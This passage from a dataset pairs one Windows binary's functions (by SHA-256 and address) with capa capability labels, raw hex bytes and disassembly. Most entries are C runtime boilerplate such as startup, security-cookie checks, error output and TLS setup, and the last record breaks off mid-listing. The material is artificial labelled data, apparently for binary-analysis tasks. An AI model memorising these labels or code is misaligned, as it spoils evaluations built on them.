sha256
stringlengths 64
64
| func_addr
stringlengths 7
14
| capa
listlengths 1
30
| bytes
stringlengths 2
1.17M
| disasm
listlengths 1
116k
|
---|---|---|---|---|
f4f77cc4d7dad4e87e36cdce330c7edfa584d7692b488286be563e0d9fbdebc9
|
0x401c0b
|
[
"Enumerate files on windows"
] |
55545d81ec58020000a1fc10410033c58945f88b45085356578d8da8fdffff51508d85ecfeffff6880fb40005029dbc785a8fdffff2a2e2a00e87000000083c4108d85acfdffff508d85ecfeffff50ff1538e040008bf883ffff74328b3558e040008d85acfdffff5057ffd685c0741e83fb047d148d85acfdffff505743ffd609c075ec83fb047c0533c040eb0231c08b4df85f5e33cd5be802000000c9c3
|
[
"push ebp",
"push esp",
"pop ebp",
"sub esp, 0x258",
"mov eax, dword [0x4110fc]",
"xor eax, ebp",
"mov dword [ebp - 8], eax",
"mov eax, dword [ebp + 8]",
"push ebx",
"push esi",
"push edi",
"lea ecx, [ebp - 0x258]",
"push ecx",
"push eax",
"lea eax, [ebp - 0x114]",
"push str._s_s",
"push eax",
"sub ebx, ebx",
"mov dword [ebp - 0x258], 0x2a2e2a",
"call fcn.00401cb9",
"add esp, 0x10",
"lea eax, [ebp - 0x254]",
"push eax",
"lea eax, [ebp - 0x114]",
"push eax",
"call dword [sym.imp.KERNEL32.dll_FindFirstFileA]",
"mov edi, eax",
"cmp edi, 0xffffffff",
"je 0x401c99",
"mov esi, dword [sym.imp.KERNEL32.dll_FindNextFileA]",
"lea eax, [ebp - 0x254]",
"push eax",
"push edi",
"call esi",
"test eax, eax",
"je 0x401c99",
"cmp ebx, 4",
"jge 0x401c94",
"lea eax, [ebp - 0x254]",
"push eax",
"push edi",
"inc ebx",
"call esi",
"or eax, eax",
"jne 0x401c7b",
"cmp ebx, 4",
"jl 0x401c99",
"xor eax, eax",
"inc eax",
"jmp 0x401c9b",
"xor eax, eax",
"mov ecx, dword [ebp - 8]",
"pop edi",
"pop esi",
"xor ecx, ebp",
"pop ebx",
"call fcn.00401caa",
"leave",
"ret"
] |
f4f77cc4d7dad4e87e36cdce330c7edfa584d7692b488286be563e0d9fbdebc9
|
0x401caa
|
[
"Terminate process"
] |
3b0dfc1041007502f3c3e98013000055545d81ec28030000a3483f4300890d443f43008915403f4300891d3c3f43008935383f4300893d343f4300668c15603f4300668c0d543f4300668c1d303f4300668c052c3f4300668c25283f4300668c2d243f43009c8f05583f43008b4500a34c3f43008b4504a3503f43008d4508a35c3f43008b85e0fcffffc705983e430001000100a1503f4300a34c3e4300c705403e4300090400c0c705443e430001000000a1fc1041008985d8fcffffa1001141008985dcfcffffff15b8e04000a3903e43006a01e8d6460000596a00ff15b4e040006880e34000ff15b0e04000833d903e43000075086a01e8b24600005968090400c0ff15ace0400050ff15a8e04000c9c3
|
[
"cmp ecx, dword [0x4110fc]",
"jne 0x401cb4",
"repz ret",
"jmp 0x403039",
"push ebp",
"push esp",
"pop ebp",
"sub esp, 0x328",
"mov dword [0x433f48], eax",
"mov dword [0x433f44], ecx",
"mov dword [0x433f40], edx",
"mov dword [0x433f3c], ebx",
"mov dword [0x433f38], esi",
"mov dword [0x433f34], edi",
"mov word [0x433f60], ss",
"mov word [0x433f54], cs",
"mov word [0x433f30], ds",
"mov word [0x433f2c], es",
"mov word [0x433f28], fs",
"mov word [0x433f24], gs",
"pushfd",
"pop dword [0x433f58]",
"mov eax, dword [ebp]",
"mov dword [0x433f4c], eax",
"mov eax, dword [ebp + 4]",
"mov dword [0x433f50], eax",
"lea eax, [ebp + 8]",
"mov dword [0x433f5c], eax",
"mov eax, dword [ebp - 0x320]",
"mov dword [0x433e98], 0x10001",
"mov eax, dword [0x433f50]",
"mov dword [0x433e4c], eax",
"mov dword [0x433e40], 0xc0000409",
"mov dword [0x433e44], 1",
"mov eax, dword [0x4110fc]",
"mov dword [ebp - 0x328], eax",
"mov eax, dword [0x411100]",
"mov dword [ebp - 0x324], eax",
"call dword [sym.imp.KERNEL32.dll_IsDebuggerPresent]",
"mov dword [0x433e90], eax",
"push 1",
"call fcn.004077da",
"pop ecx",
"push 0",
"call dword [sym.imp.KERNEL32.dll_SetUnhandledExceptionFilter]",
"push 0x40e380",
"call dword [sym.imp.KERNEL32.dll_UnhandledExceptionFilter]",
"cmp dword [0x433e90], 0",
"jne 0x403129",
"push 1",
"call fcn.004077da",
"pop ecx",
"push 0xc0000409",
"call dword [sym.imp.KERNEL32.dll_GetCurrentProcess]",
"push eax",
"call dword [sym.imp.KERNEL32.dll_TerminateProcess]",
"leave",
"ret"
] |
f4f77cc4d7dad4e87e36cdce330c7edfa584d7692b488286be563e0d9fbdebc9
|
0x40302f
|
[
"Accept command line arguments",
"Terminate process"
] |
6a6068e8fd4000e8f94600008365fc008d459050ff15a4e04000c745fcfeffffffbf94000000576a008b1da0e04000ffd350ff159ce040008bf085f6750d6a12e856ffffff59e98a010000893e56ff1598e04000566a0009c0750effd350ff1594e04000e96c0100008b46108945e08b46048945dc8b46088945d88b7e0c81e7ff7f0000ffd350ff1594e040008b75e083fe02740681cf008000008b4ddc5158c1e0088b55d803c2893580424300a388424300890d8c424300891590424300893d84424300e8f5feffff8945e029db4353e8d34500005909c075086a1ce8b9feffff59e8fa15000009c075086a10e8a8feffff59e80d450000895dfce8c542000085c07d086a1be8ab37000059ff1590e04000a3585a4300e874410000a3303e4300e8b140000009c07d086a08e88537000059e82d3e000085c07d086a09e8743700005953e8893800005985c0740750e86237000059e8ad3d0000845dbc74060fb74dc0eb036a0a5951506a006800004000e834e7ffff8945e4837de000750650e8ad390000e8ca390000eb2ec745fcfeffffff8b45e4eb13b8ff000000e86b450000c3e812470000e916feffff
|
[
"push 0x60",
"push 0x40fde8",
"call fcn.00407554",
"and dword [ebp - 4], 0",
"lea eax, [ebp - 0x70]",
"push eax",
"call dword [sym.imp.KERNEL32.dll_GetStartupInfoA]",
"mov dword [ebp - 4], 0xfffffffe",
"mov edi, 0x94",
"push edi",
"push 0",
"mov ebx, dword [sym.imp.KERNEL32.dll_GetProcessHeap]",
"call ebx",
"push eax",
"call dword [sym.imp.KERNEL32.dll_HeapAlloc]",
"mov esi, eax",
"test esi, esi",
"jne 0x402e9a",
"push 0x12",
"call fcn.00402dea",
"pop ecx",
"jmp 0x403024",
"mov dword [esi], edi",
"push esi",
"call dword [sym.imp.KERNEL32.dll_GetVersionExA]",
"push esi",
"push 0",
"or eax, eax",
"jne 0x402eb8",
"call ebx",
"push eax",
"call dword [sym.imp.KERNEL32.dll_HeapFree]",
"jmp 0x403024",
"mov eax, dword [esi + 0x10]",
"mov dword [ebp - 0x20], eax",
"mov eax, dword [esi + 4]",
"mov dword [ebp - 0x24], eax",
"mov eax, dword [esi + 8]",
"mov dword [ebp - 0x28], eax",
"mov edi, dword [esi + 0xc]",
"and edi, 0x7fff",
"call ebx",
"push eax",
"call dword [sym.imp.KERNEL32.dll_HeapFree]",
"mov esi, dword [ebp - 0x20]",
"cmp esi, 2",
"je 0x402eea",
"or edi, 0x8000",
"mov ecx, dword [ebp - 0x24]",
"push ecx",
"pop eax",
"shl eax, 8",
"mov edx, dword [ebp - 0x28]",
"add eax, edx",
"mov dword [0x434280], esi",
"mov dword [0x434288], eax",
"mov dword [0x43428c], ecx",
"mov dword [0x434290], edx",
"mov dword [0x434284], edi",
"call fcn.00402e0e",
"mov dword [ebp - 0x20], eax",
"sub ebx, ebx",
"inc ebx",
"push ebx",
"call fcn.004074f8",
"pop ecx",
"or eax, eax",
"jne 0x402f32",
"push 0x1c",
"call fcn.00402dea",
"pop ecx",
"call fcn.00404531",
"or eax, eax",
"jne 0x402f43",
"push 0x10",
"call fcn.00402dea",
"pop ecx",
"call fcn.00407455",
"mov dword [ebp - 4], ebx",
"call fcn.00407215",
"test eax, eax",
"jge 0x402f5c",
"push 0x1b",
"call fcn.00406706",
"pop ecx",
"call dword [sym.imp.KERNEL32.dll_GetCommandLineA]",
"mov dword [0x435a58], eax",
"call fcn.004070e0",
"mov dword [0x433e30], eax",
"call fcn.00407027",
"or eax, eax",
"jge 0x402f82",
"push 8",
"call fcn.00406706",
"pop ecx",
"call fcn.00406db4",
"test eax, eax",
"jge 0x402f93",
"push 9",
"call fcn.00406706",
"pop ecx",
"push ebx",
"call fcn.00406822",
"pop ecx",
"test eax, eax",
"je 0x402fa5",
"push eax",
"call fcn.00406706",
"pop ecx",
"call fcn.00406d57",
"test byte [ebp - 0x44], bl",
"je 0x402fb5",
"movzx ecx, word [ebp - 0x40]",
"jmp 0x402fb8",
"push 0xa",
"pop ecx",
"push ecx",
"push eax",
"push 0",
"push 0x400000",
"call main",
"mov dword [ebp - 0x1c], eax",
"cmp dword [ebp - 0x20], 0",
"jne 0x402fd5",
"push eax",
"call fcn.00406982",
"call fcn.004069a4",
"jmp 0x40300a",
"mov dword [ebp - 4], 0xfffffffe",
"mov eax, dword [ebp - 0x1c]",
"jmp 0x403029",
"mov eax, 0xff",
"call fcn.00407599",
"ret",
"call fcn.00407746",
"jmp 0x402e4f"
] |
f4f77cc4d7dad4e87e36cdce330c7edfa584d7692b488286be563e0d9fbdebc9
|
0x403039
|
[
"Terminate process"
] |
3b0dfc1041007502f3c3e98013000055545d81ec28030000a3483f4300890d443f43008915403f4300891d3c3f43008935383f4300893d343f4300668c15603f4300668c0d543f4300668c1d303f4300668c052c3f4300668c25283f4300668c2d243f43009c8f05583f43008b4500a34c3f43008b4504a3503f43008d4508a35c3f43008b85e0fcffffc705983e430001000100a1503f4300a34c3e4300c705403e4300090400c0c705443e430001000000a1fc1041008985d8fcffffa1001141008985dcfcffffff15b8e04000a3903e43006a01e8d6460000596a00ff15b4e040006880e34000ff15b0e04000833d903e43000075086a01e8b24600005968090400c0ff15ace0400050ff15a8e04000c9c3
|
[
"cmp ecx, dword [0x4110fc]",
"jne 0x401cb4",
"repz ret",
"jmp 0x403039",
"push ebp",
"push esp",
"pop ebp",
"sub esp, 0x328",
"mov dword [0x433f48], eax",
"mov dword [0x433f44], ecx",
"mov dword [0x433f40], edx",
"mov dword [0x433f3c], ebx",
"mov dword [0x433f38], esi",
"mov dword [0x433f34], edi",
"mov word [0x433f60], ss",
"mov word [0x433f54], cs",
"mov word [0x433f30], ds",
"mov word [0x433f2c], es",
"mov word [0x433f28], fs",
"mov word [0x433f24], gs",
"pushfd",
"pop dword [0x433f58]",
"mov eax, dword [ebp]",
"mov dword [0x433f4c], eax",
"mov eax, dword [ebp + 4]",
"mov dword [0x433f50], eax",
"lea eax, [ebp + 8]",
"mov dword [0x433f5c], eax",
"mov eax, dword [ebp - 0x320]",
"mov dword [0x433e98], 0x10001",
"mov eax, dword [0x433f50]",
"mov dword [0x433e4c], eax",
"mov dword [0x433e40], 0xc0000409",
"mov dword [0x433e44], 1",
"mov eax, dword [0x4110fc]",
"mov dword [ebp - 0x328], eax",
"mov eax, dword [0x411100]",
"mov dword [ebp - 0x324], eax",
"call dword [sym.imp.KERNEL32.dll_IsDebuggerPresent]",
"mov dword [0x433e90], eax",
"push 1",
"call fcn.004077da",
"pop ecx",
"push 0",
"call dword [sym.imp.KERNEL32.dll_SetUnhandledExceptionFilter]",
"push 0x40e380",
"call dword [sym.imp.KERNEL32.dll_UnhandledExceptionFilter]",
"cmp dword [0x433e90], 0",
"jne 0x403129",
"push 1",
"call fcn.004077da",
"pop ecx",
"push 0xc0000409",
"call dword [sym.imp.KERNEL32.dll_GetCurrentProcess]",
"push eax",
"call dword [sym.imp.KERNEL32.dll_TerminateProcess]",
"leave",
"ret"
] |
f4f77cc4d7dad4e87e36cdce330c7edfa584d7692b488286be563e0d9fbdebc9
|
0x403d3b
|
[
"Terminate process"
] |
55545dff3564414300e8a504000009c05974035dffe06a02e8823a0000595de9e0feffff
|
[
"push ebp",
"push esp",
"pop ebp",
"push dword [0x434164]",
"call fcn.004041ee",
"or eax, eax",
"pop ecx",
"je 0x403d51",
"pop ebp",
"jmp eax",
"push 2",
"call fcn.004077da",
"pop ecx",
"pop ebp",
"jmp fcn.00403c3f"
] |
f4f77cc4d7dad4e87e36cdce330c7edfa584d7692b488286be563e0d9fbdebc9
|
0x404531
|
[
"Allocate thread local storage",
"Set thread local storage value"
] |
57680ce44000ff15c0e04000505f85ff7509e83cfdffff33c05fc3568b35bce04000684ce4400057ffd66840e4400057a368414300ffd66834e4400057a36c414300ffd6682ce4400057a370414300ffd6833d68414300008b35cce04000a3744143007416833d6c41430000740d833d7041430000740409c07524a1c4e04000a36c414300a1d0e04000c7056841430051424000893570414300a374414300ff15c8e0400083f8ffa3841241000f84cc000000ff356c41430050ffd609c00f84bb000000e8c8230000ff3568414300e87dfbffffff356c414300a368414300e86dfbffffff3570414300a36c414300e85dfbffffff3574414300a370414300e84dfbffff83c410a374414300e8b249000085c074656810444000ff3568414300e898fbffff59ffd083f8ffa380124100744868140200006a01e80e0b0000505e09f65959743456ff3580124100ff3570414300e865fbffff59ffd009c0741b6a0056e829fcffff5959ff15dce04000834e04ff890633c040eb07e8d4fbffff33c05e5fc3
|
[
"push edi",
"push str.KERNEL32.DLL",
"call dword [sym.imp.KERNEL32.dll_GetModuleHandleA]",
"push eax",
"pop edi",
"test edi, edi",
"jne 0x40454c",
"call fcn.00404284",
"xor eax, eax",
"pop edi",
"ret",
"push esi",
"mov esi, dword [sym.imp.KERNEL32.dll_GetProcAddress]",
"push str.FlsAlloc",
"push edi",
"call esi",
"push str.FlsGetValue",
"push edi",
"mov dword [0x434168], eax",
"call esi",
"push str.FlsSetValue",
"push edi",
"mov dword [0x43416c], eax",
"call esi",
"push str.FlsFree",
"push edi",
"mov dword [0x434170], eax",
"call esi",
"cmp dword [0x434168], 0",
"mov esi, dword [sym.imp.KERNEL32.dll_TlsSetValue]",
"mov dword [0x434174], eax",
"je 0x4045ac",
"cmp dword [0x43416c], 0",
"je 0x4045ac",
"cmp dword [0x434170], 0",
"je 0x4045ac",
"or eax, eax",
"jne 0x4045d0",
"mov eax, dword [sym.imp.KERNEL32.dll_TlsGetValue]",
"mov dword [0x43416c], eax",
"mov eax, dword [sym.imp.KERNEL32.dll_TlsFree]",
"mov dword [0x434168], 0x404251",
"mov dword [0x434170], esi",
"mov dword [0x434174], eax",
"call dword [sym.imp.KERNEL32.dll_TlsAlloc]",
"cmp eax, 0xffffffff",
"mov dword [0x411284], eax",
"je 0x4046b0",
"push dword [0x43416c]",
"push eax",
"call esi",
"or eax, eax",
"je 0x4046b0",
"call fcn.004069c2",
"push dword [0x434168]",
"call fcn.00404182",
"push dword [0x43416c]",
"mov dword [0x434168], eax",
"call fcn.00404182",
"push dword [0x434170]",
"mov dword [0x43416c], eax",
"call fcn.00404182",
"push dword [0x434174]",
"mov dword [0x434170], eax",
"call fcn.00404182",
"add esp, 0x10",
"mov dword [0x434174], eax",
"call fcn.00408ff4",
"test eax, eax",
"je 0x4046ab",
"push 0x404410",
"push dword [0x434168]",
"call fcn.004041ee",
"pop ecx",
"call eax",
"cmp eax, 0xffffffff",
"mov dword [0x411280], eax",
"je 0x4046ab",
"push 0x214",
"push 1",
"call fcn.0040517d",
"push eax",
"pop esi",
"or esi, esi",
"pop ecx",
"pop ecx",
"je 0x4046ab",
"push esi",
"push dword [0x411280]",
"push dword [0x434170]",
"call fcn.004041ee",
"pop ecx",
"call eax",
"or eax, eax",
"je 0x4046ab",
"push 0",
"push esi",
"call fcn.004042c1",
"pop ecx",
"pop ecx",
"call dword [sym.imp.KERNEL32.dll_GetCurrentThreadId]",
"or dword [esi + 4], 0xffffffff",
"mov dword [esi], eax",
"xor eax, eax",
"inc eax",
"jmp 0x4046b2",
"call fcn.00404284",
"xor eax, eax",
"pop esi",
"pop edi",
"ret"
] |
f4f77cc4d7dad4e87e36cdce330c7edfa584d7692b488286be563e0d9fbdebc9
|
0x406a0e
|
[
"Write file on windows"
] |
51538b5c240c565729f631ff3b1cfde819410074064783ff177cf183ff170f8377010000556a03e8494c000083f801590f84310100006a03e8384c000085c059750d833df8104100010f841801000081fbfc0000000f843f0100006820eb4000bb1403000053bdc842430055e859e6ffff83c40c09c0740d5656565656e8afd1ffff83c4146804010000bee1424300566a00c605e543430000ff1554e0400009c075266808eb400068fb02000056e817e6ffff83c40c09c0740f33c05050505050e86bd1ffff83c41456e873b2ffff4083f83c59763856e866b2ffff83ee3b03c66a03b9dc4543006804eb40002bc85150e8b22f000083c41409c0741129f65656565656e828d1ffff83c414eb0233f66800eb40005355e8cd2e000083c40c09c0740d5656565656e804d1ffff83c414ff34fdec1941005355e8ab2e000083c40c09c0740d5656565656e8e2d0ffff83c414681020010068d8ea400055e87549000083c40ceb336af4ff1504e14000505d3bee742583fdff74206a008d442414508d34fdec194100ff36e8b3b1ffff5950ff3655ff1520e040005d5f5e5b59c3
|
[
"push ecx",
"push ebx",
"mov ebx, dword [esp + 0xc]",
"push esi",
"push edi",
"sub esi, esi",
"xor edi, edi",
"cmp ebx, dword [edi*8 + 0x4119e8]",
"je 0x406a29",
"inc edi",
"cmp edi, 0x17",
"jl 0x406a1a",
"cmp edi, 0x17",
"jae 0x406ba9",
"push ebp",
"push 3",
"call fcn.0040b683",
"cmp eax, 1",
"pop ecx",
"je 0x406b75",
"push 3",
"call fcn.0040b683",
"test eax, eax",
"pop ecx",
"jne 0x406a5d",
"cmp dword [0x4110f8], 1",
"je 0x406b75",
"cmp ebx, 0xfc",
"je 0x406ba8",
"push str.Runtime_Error__n_nProgram:",
"mov ebx, 0x314",
"push ebx",
"mov ebp, 0x4342c8",
"push ebp",
"call fcn.004050d8",
"add esp, 0xc",
"or eax, eax",
"je 0x406a93",
"push esi",
"push esi",
"push esi",
"push esi",
"push esi",
"call fcn.00403c3f",
"add esp, 0x14",
"push 0x104",
"mov esi, 0x4342e1",
"push esi",
"push 0",
"mov byte [0x4343e5], 0",
"call dword [sym.imp.KERNEL32.dll_GetModuleFileNameA]",
"or eax, eax",
"jne 0x406ad7",
"push str._program_name_unknown_",
"push 0x2fb",
"push esi",
"call fcn.004050d8",
"add esp, 0xc",
"or eax, eax",
"je 0x406ad7",
"xor eax, eax",
"push eax",
"push eax",
"push eax",
"push eax",
"push eax",
"call fcn.00403c3f",
"add esp, 0x14",
"push esi",
"call fcn.00401d50",
"inc eax",
"cmp eax, 0x3c",
"pop ecx",
"jbe 0x406b1c",
"push esi",
"call fcn.00401d50",
"sub esi, 0x3b",
"add eax, esi",
"push 3",
"mov ecx, 0x4345dc",
"push 0x40eb04",
"sub ecx, eax",
"push ecx",
"push eax",
"call fcn.00409ab6",
"add esp, 0x14",
"or eax, eax",
"je 0x406b1c",
"sub esi, esi",
"push esi",
"push esi",
"push esi",
"push esi",
"push esi",
"call fcn.00403c3f",
"add esp, 0x14",
"jmp 0x406b1e",
"xor esi, esi",
"push 0x40eb00",
"push ebx",
"push ebp",
"call fcn.004099f7",
"add esp, 0xc",
"or eax, eax",
"je 0x406b3e",
"push esi",
"push esi",
"push esi",
"push esi",
"push esi",
"call fcn.00403c3f",
"add esp, 0x14",
"push dword [edi*8 + 0x4119ec]",
"push ebx",
"push ebp",
"call fcn.004099f7",
"add esp, 0xc",
"or eax, eax",
"je 0x406b60",
"push esi",
"push esi",
"push esi",
"push esi",
"push esi",
"call fcn.00403c3f",
"add esp, 0x14",
"push 0x12010",
"push str.Microsoft_Visual_C_Runtime_Library",
"push ebp",
"call fcn.0040b4e5",
"add esp, 0xc",
"jmp 0x406ba8",
"push 0xfffffffffffffff4",
"call dword [sym.imp.KERNEL32.dll_GetStdHandle]",
"push eax",
"pop ebp",
"cmp ebp, esi",
"je 0x406ba8",
"cmp ebp, 0xffffffff",
"je 0x406ba8",
"push 0",
"lea eax, [esp + 0x14]",
"push eax",
"lea esi, [edi*8 + 0x4119ec]",
"push dword [esi]",
"call fcn.00401d50",
"pop ecx",
"push eax",
"push dword [esi]",
"push ebp",
"call dword [sym.imp.KERNEL32.dll_WriteFile]",
"pop ebp",
"pop edi",
"pop esi",
"pop ebx",
"pop ecx",
"ret"
] |
f4f77cc4d7dad4e87e36cdce330c7edfa584d7692b488286be563e0d9fbdebc9
|
0x4070e0
|
[
"Query environment variable"
] |
5151a1e8464300535556578b3d14e1400033db29f63bc36a025d752dffd7505e3bf3740cc705e846430001000000eb22ff153ce0400083f87875095558a3e8464300eb05a1e846430083f8010f85840000003bf3750fffd7505e3bf3750733c0e9c900000066391e5658740e03c566391875f903c566391875f28b3df4e040005353532bc653d1f8405056535389442434ffd7505d3beb743255e8bedfffff3bc35989442410742353535550ff742424565353ffd709c0750eff742410e8a8deffff59895c24108b5c241056ff1510e140005358eb583bc574043bc37580ff150ce14000505e3bf30f8470ffffff381e740a40381875fb40381875f62bc6408be855e856dfffff505f3bfb59750c56ff1508e14000e944ffffff555657e85ee0ffff83c40c56ff1508e140008bc75f5e5d5b5959c3
|
[
"push ecx",
"push ecx",
"mov eax, dword [0x4346e8]",
"push ebx",
"push ebp",
"push esi",
"push edi",
"mov edi, dword [sym.imp.KERNEL32.dll_GetEnvironmentStringsW]",
"xor ebx, ebx",
"sub esi, esi",
"cmp eax, ebx",
"push 2",
"pop ebp",
"jne 0x407129",
"call edi",
"push eax",
"pop esi",
"cmp esi, ebx",
"je 0x407110",
"mov dword [0x4346e8], 1",
"jmp 0x407132",
"call dword [sym.imp.KERNEL32.dll_GetLastError]",
"cmp eax, 0x78",
"jne 0x407124",
"push ebp",
"pop eax",
"mov dword [0x4346e8], eax",
"jmp 0x407129",
"mov eax, dword [0x4346e8]",
"cmp eax, 1",
"jne 0x4071b6",
"cmp esi, ebx",
"jne 0x407145",
"call edi",
"push eax",
"pop esi",
"cmp esi, ebx",
"jne 0x407145",
"xor eax, eax",
"jmp 0x40720e",
"cmp word [esi], bx",
"push esi",
"pop eax",
"je 0x40715a",
"add eax, ebp",
"cmp word [eax], bx",
"jne 0x40714c",
"add eax, ebp",
"cmp word [eax], bx",
"jne 0x40714c",
"mov edi, dword [sym.imp.KERNEL32.dll_WideCharToMultiByte]",
"push ebx",
"push ebx",
"push ebx",
"sub eax, esi",
"push ebx",
"sar eax, 1",
"inc eax",
"push eax",
"push esi",
"push ebx",
"push ebx",
"mov dword [esp + 0x34], eax",
"call edi",
"push eax",
"pop ebp",
"cmp ebp, ebx",
"je 0x4071ab",
"push ebp",
"call fcn.0040513d",
"cmp eax, ebx",
"pop ecx",
"mov dword [esp + 0x10], eax",
"je 0x4071ab",
"push ebx",
"push ebx",
"push ebp",
"push eax",
"push dword [esp + 0x24]",
"push esi",
"push ebx",
"push ebx",
"call edi",
"or eax, eax",
"jne 0x4071a7",
"push dword [esp + 0x10]",
"call fcn.0040504a",
"pop ecx",
"mov dword [esp + 0x10], ebx",
"mov ebx, dword [esp + 0x10]",
"push esi",
"call dword [sym.imp.KERNEL32.dll_FreeEnvironmentStringsW]",
"push ebx",
"pop eax",
"jmp 0x40720e",
"cmp eax, ebp",
"je 0x4071be",
"cmp eax, ebx",
"jne 0x40713e",
"call dword [sym.imp.KERNEL32.dll_GetEnvironmentStrings]",
"push eax",
"pop esi",
"cmp esi, ebx",
"je 0x40713e",
"cmp byte [esi], bl",
"je 0x4071dc",
"inc eax",
"cmp byte [eax], bl",
"jne 0x4071d2",
"inc eax",
"cmp byte [eax], bl",
"jne 0x4071d2",
"sub eax, esi",
"inc eax",
"mov ebp, eax",
"push ebp",
"call fcn.0040513d",
"push eax",
"pop edi",
"cmp edi, ebx",
"pop ecx",
"jne 0x4071fa",
"push esi",
"call dword [sym.imp.KERNEL32.dll_FreeEnvironmentStringsA]",
"jmp 0x40713e",
"push ebp",
"push esi",
"push edi",
"call fcn.00405260",
"add esp, 0xc",
"push esi",
"call dword [sym.imp.KERNEL32.dll_FreeEnvironmentStringsA]",
"mov eax, edi",
"pop edi",
"pop esi",
"pop ebp",
"pop ebx",
"pop ecx",
"pop ecx",
"ret"
] |
f4f77cc4d7dad4e87e36cdce330c7edfa584d7692b488286be563e0d9fbdebc9
|
0x40797e
|
[
"Write file on windows"
] |
558dac24e8faffff81ec94050000a1fc10410033c58985140500008b85240500005629f639b52805000089459c8975a0897598750729c0e9740500003bc67527e8eac3ffff8930e8d0c3ffff5656565656c70016000000e861c3ffff83c41483c8ffe9490500008bb52005000053565b83e31f6bdb288bc6c1f805578d3c85405943008b0703c38a482402c9d0f980f902897d90884dab740580f90175338b8d28050000f7d1f6c1017526e87fc3ffff31f68930e863c3ffff5656565656c70016000000e8f4c2ffff83c414e9d5040000f6400420740f6a026a006a0056e881fdffff83c41056e8fa05000009c0590f84f60100008b07f6440304800f84e9010000e873c9ffff8b406c31c93948148d45840f94c1508b07ff3403515eff1540e1400085c00f84c001000085f6740a807dab000f84b2010000ff153ce140008365b00083bd28050000008b759c89458489758c0f86ff0300008365a400eb038b758c8a45ab84c00f85060100008a0629c93c0a0f94c10fbec050894d88e856e3ffff85c059751a6a018d45ac5650e8fb40000083c40c83f8ff0f84af030000eb308b459c2bc603852805000083f8010f86990300006a028d45ac5650e8cd40000083c40c83f8ff0f848103000046ff45a429c050506a058d8d0c050000516a018d4dac5150ff758446ff45a489758cff15f4e04000505e09f60f844f0300006a008d45b050568d850c050000508b07ff3403ff1520e0400085c00f84250300008b45b00145a03bc60f8c20030000837d88000f849f0000006a008d45b0506a018d850c050000508b07c6850c0500000dff3403ff1520e0400009c00f84e4020000837db0010f8ce3020000ff4598ff45a0eb643c0174043c02751b0fb70e31d26683f90a0f94c246468345a402894dac89758c8955883c0174043c027539ff75ace8133e0000663b45ac590f8594020000ff45a0837d8800741d6a0d58508945ace8f33d0000663b45ac590f8574020000ff45a0ff45988b85280500003945a40f8279feffffe9630200008b0703c3f64004800f84250200008b459c33f6807dab008975ac0f859100000039b5280500008945b00f86650200008b4db08365a4002b4d9c8d45b43b8d2805000073278b55b0ff45b08a124180fa0a750aff4598c6000d40ff45a4881040ff45a4817da40004000072d18bf08d45b42bf06a008d459450568d45b4508b07ff3403ff1520e0400085c00f84ca0100008b45940145a03bc60f8cc50100008b45b02b459c3b85280500007283e9b2010000807dab020f859d00000039b5280500008945b00f86ca0100008b4db029f62b4d9c8d45b43b8d2805000073318b55b08345b0020fb71241416683fa0a750d8345980266c7000d00404046468b7d906689104040464681feff03000072c7505e8d45b42bf06a008d459450568d45b4508b07ff3403ff1520e0400085c00f84270100008b45940145a03bc60f8c220100008b45b02b459c3b85280500000f8277ffffffe90b01000039b5280500008945a40f862d0100008b4da48365b0002b4d9c6a028d85b80300005e3b8d28050000732c8b55a40fb7120175a403ce6683fa0a750a66c7000d0003c60175b00175b066891003c6817db05201000072cc29f6565668ab0200008d8d08010000518d8db80300002bc1992bc2d1f8505158505668e9fd0000ff15f4e04000505f3bfe74796a008d45945057582bc6508d843508010000508b45908b00ff3403ff1520e0400009c074090375943bfe7fd4eb09ff153ce040008945ac3bfe7f478b45a42b459c3b85280500008945a00f8236ffffffeb306a008d4d9451ffb528050000ff759cff30ff1520e0400085c0740c8b45948365ac008945a0eb09ff153ce040008945ac8b45a085c075568b7d9031f63975ac74206a055e3975ac750de8b0beffffc70009000000eb2bff75ace8c6beffff59eb278b07f644030440740c8b459c80381a750433c0eb1ae883beffffc7001c000000e88bbeffff893083c8ffeb032b45985f5b8b8d1405000033cd5ee86e9dffff81c518050000c9c3
|
[
"push ebp",
"lea ebp, [esp - 0x518]",
"sub esp, 0x594",
"mov eax, dword [0x4110fc]",
"xor eax, ebp",
"mov dword [ebp + 0x514], eax",
"mov eax, dword [ebp + 0x524]",
"push esi",
"sub esi, esi",
"cmp dword [ebp + 0x528], esi",
"mov dword [ebp - 0x64], eax",
"mov dword [ebp - 0x60], esi",
"mov dword [ebp - 0x68], esi",
"jne 0x4079ba",
"sub eax, eax",
"jmp 0x407f2e",
"cmp eax, esi",
"jne 0x4079e5",
"call fcn.00403dad",
"mov dword [eax], esi",
"call fcn.00403d9a",
"push esi",
"push esi",
"push esi",
"push esi",
"push esi",
"mov dword [eax], 0x16",
"call fcn.00403d3b",
"add esp, 0x14",
"or eax, 0xffffffff",
"jmp 0x407f2e",
"mov esi, dword [ebp + 0x520]",
"push ebx",
"push esi",
"pop ebx",
"and ebx, 0x1f",
"imul ebx, ebx, 0x28",
"mov eax, esi",
"sar eax, 5",
"push edi",
"lea edi, [eax*4 + 0x435940]",
"mov eax, dword [edi]",
"add eax, ebx",
"mov cl, byte [eax + 0x24]",
"add cl, cl",
"sar cl, 1",
"cmp cl, 2",
"mov dword [ebp - 0x70], edi",
"mov byte [ebp - 0x55], cl",
"je 0x407a1c",
"cmp cl, 1",
"jne 0x407a4f",
"mov ecx, dword [ebp + 0x528]",
"not ecx",
"test cl, 1",
"jne 0x407a4f",
"call fcn.00403dad",
"xor esi, esi",
"mov dword [eax], esi",
"call fcn.00403d9a",
"push esi",
"push esi",
"push esi",
"push esi",
"push esi",
"mov dword [eax], 0x16",
"call fcn.00403d3b",
"add esp, 0x14",
"jmp 0x407f24",
"test byte [eax + 4], 0x20",
"je 0x407a64",
"push 2",
"push 0",
"push 0",
"push esi",
"call fcn.004077e2",
"add esp, 0x10",
"push esi",
"call fcn.00408064",
"or eax, eax",
"pop ecx",
"je 0x407c69",
"mov eax, dword [edi]",
"test byte [ebx + eax + 4], 0x80",
"je 0x407c69",
"call fcn.004043f8",
"mov eax, dword [eax + 0x6c]",
"xor ecx, ecx",
"cmp dword [eax + 0x14], ecx",
"lea eax, [ebp - 0x7c]",
"sete cl",
"push eax",
"mov eax, dword [edi]",
"push dword [ebx + eax]",
"push ecx",
"pop esi",
"call dword [sym.imp.KERNEL32.dll_GetConsoleMode]",
"test eax, eax",
"je 0x407c69",
"test esi, esi",
"je 0x407ab7",
"cmp byte [ebp - 0x55], 0",
"je 0x407c69",
